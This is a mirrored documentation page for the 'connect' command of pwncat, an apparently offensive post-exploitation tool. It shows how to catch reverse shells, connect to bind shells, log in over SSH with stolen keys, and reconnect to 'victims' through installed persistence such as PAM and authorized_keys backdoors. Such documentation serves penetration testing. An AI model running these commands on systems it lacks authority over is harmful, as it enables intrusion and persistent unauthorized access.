mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-12-04 06:13:45 +01:00
137 lines
6.7 KiB
ReStructuredText
137 lines
6.7 KiB
ReStructuredText
Connect
|
|
=======
|
|
|
|
The ``connect`` command is used to connect to a remote victim. It can be used to catch a reverse shell, open a bind
|
|
shell, utilize legitimate SSH credentials, or reconnect via a previous persistence methood to a known host.
|
|
|
|
This command is also the command which is run if you pass arguments to the external ``pwncat`` script. All arguments
|
|
to ``pwncat`` are passed directly to the ``connect`` command at startup. If no connection is made during this command,
|
|
``pwncat`` will automatically exit after command completion.
|
|
|
|
The ``connect`` command is only accessible prior to an active connection. If you attempt to run this command after a
|
|
connection has been established, it will not attempt a new connection and will not load your configuration script.
|
|
Because the ``pwncat`` prompt is only accessible after a connection, this command is effectively only useful
|
|
when used as the arguments to the main ``pwncat`` application or in configuration scripts. Replacing ``connect``
|
|
with ``pwncat`` in any examples below will also function the same way at startup.
|
|
|
|
Catching a Reverse Shell
|
|
------------------------
|
|
|
|
Reverse shell listeners are started with the ``--listen`` parameter. This mode requires the ``--host`` and ``--port``
|
|
parameters as well. If ``--host`` is not specified, it is assumed to be ``0.0.0.0`` to bind to all interfaces. To
|
|
listen for incoming shell connections on port 4444, you could issue a command like:
|
|
|
|
.. code-block::
|
|
|
|
connect -l -H 0.0.0.0 -p 4444
|
|
|
|
Connecting to a Bind Shell
|
|
--------------------------
|
|
|
|
Making an outbound connection to a bind shell is accomplished through the ``--connect`` parameter. This mode requires
|
|
both the ``--host`` and ``--port`` parameters to be specified.
|
|
|
|
.. code-block::
|
|
|
|
connect -c -H 1.1.1.1 -p 4444
|
|
|
|
Connecting to an SSH Server
|
|
---------------------------
|
|
|
|
If you have valid credentials to a remote SSH server, but would like to utilize ``pwncat`` to manage your session, you
|
|
can use the ``--ssh`` option. This mode requires the ``--host``, ``--user``, and ``--port`` options. If no port is
|
|
specified, it will default to ``22``. Along with these options, you must specify either a ``--password`` or ``--identity``
|
|
for the remote password or private key identity file respectively. ``pwncat`` will use Paramiko to connect to the
|
|
victim and establish a PTY shell. It will then act normally and provide you access to this shell. All normal ``pwncat``
|
|
features are still available over the SSH transport!
|
|
|
|
.. code-block::
|
|
:caption: Connecting with a known password
|
|
|
|
connect -s -H 1.1.1.1 -u root -p "P@ssw0rd"
|
|
|
|
.. code-block::
|
|
:caption: Connection with a known private key
|
|
|
|
connect -s -H 1.1.1.1 -u root -i "./exfiled-privkey"
|
|
|
|
Listing Known Persistence Methods
|
|
---------------------------------
|
|
|
|
The ``connect`` command has the ability to query the database for all known remote hosts and list installed persistence
|
|
methods. It also provides the ability to leverage installed persistence methods to reconnect to a specific host. This
|
|
allows you to easily re-establish your session after disconnection if you installed some form of persistence.
|
|
|
|
In ``pwncat`` hosts are identified by a "host hash". This has is generated by combining some unique data taken from the
|
|
remote host the last time a session was established and should be unique across all hosts (unlike IP addresses). The
|
|
ideal way to reference a remote host is by it's host hash. With an open session, you can retrieve your host hash with
|
|
the ``sysinfo`` command. To retrieve known hosts with persistence methods after disconnection, you can use the
|
|
``--list`` option to the ``connect`` command:
|
|
|
|
.. code-block::
|
|
:caption: Retrieving a list of known hosts
|
|
|
|
$ pwncat -C data/pwncatrc --list
|
|
1.1.1.1 - debian - d87b9646813d250ac433decdee70112a
|
|
- pam as system
|
|
- authorized_keys as debian
|
|
|
|
When reconnecting to a host, you will need either the host hash or the IP address. While the host hash is preferred,
|
|
``pwncat`` will lookup a host by IP address in the database. In cases where multiple hosts are NAT'd behind a single
|
|
IP address, ``pwncat`` will choose the first host from the database with a matching IP address.
|
|
|
|
Reconnecting to a Victim
|
|
------------------------
|
|
|
|
Once you have your victim's IP address or host hash, you are ready to reconnect. Reconnecting is simple and automatic in
|
|
most cases. The simplest option is to supply the victim IP or host hash to the ``--host`` parameter and specify the
|
|
``--reconnect`` option. This will try each persistence method individually until one succeeds in a session:
|
|
|
|
.. code-block::
|
|
|
|
$ pwncat -C data/pwncatrc -r -H d87b9646813d250ac433decdee70112a
|
|
[+] setting terminal prompt
|
|
[+] running in /bin/bash
|
|
[+] terminal state synchronized
|
|
[+] pwncat is ready 🐈
|
|
|
|
(remote) debian@debian-s-1vcpu-1gb-nyc1-01:~$
|
|
|
|
If you have installed multiple persistence methods for multiple users, you can also specify a persistence method or user
|
|
to connect with. If only one of ``--method`` or ``--user`` is specified, all methods matching your search will be tried.
|
|
For example, specifying only ``method`` will cause ``pwncat`` to attempt each user for which that method is installed.
|
|
On the other hand, specifying only ``--user`` will cause ``pwncat`` to attempt connection with every method which
|
|
offers persistence as that user. When both are specified, only the exact matching persistence method will be attempted.
|
|
|
|
Automated Connection w/ Configuration Script
|
|
--------------------------------------------
|
|
|
|
Configuration scripts are expected to be used on an engagement basis. If you have made a connection to victim and have
|
|
installed persistence methods, you can add your connect command to your configuration script in order to simply
|
|
connection in the future. For example, if you have made a previous connection to the host ``1.1.1.1`` and would like
|
|
``pwncat`` to automatically reconnect to that host on startup, you could create a configuration script:
|
|
|
|
.. code-block:: bash
|
|
:caption: pwncatrc - configuration script
|
|
|
|
# Ensure pwncat knows about your database
|
|
set db "sqlite:///engagement.sqlite"
|
|
|
|
# Automatically attempt reconnection to your host via authorized_keys
|
|
# as the root user
|
|
connect --reconnnect --host 1.1.1.1 -m authorized_keys -u root
|
|
|
|
With this script, ``pwncat`` will attempt to connect to the specified host without any other parameters. This simplifies
|
|
the ``pwncat`` command if you intend to connect/reconnect multiple times.
|
|
|
|
.. code-block:: bash
|
|
:caption: Simplified Reconnection w/ Configuration Script
|
|
|
|
$ pwncat -C data/pwncatrc
|
|
[+] setting terminal prompt
|
|
[+] running in /usr/bin/bash
|
|
[+] terminal state synchronized
|
|
[+] pwncat is ready 🐈
|
|
|
|
(remote) root@pwncat-centos-testing:~#
|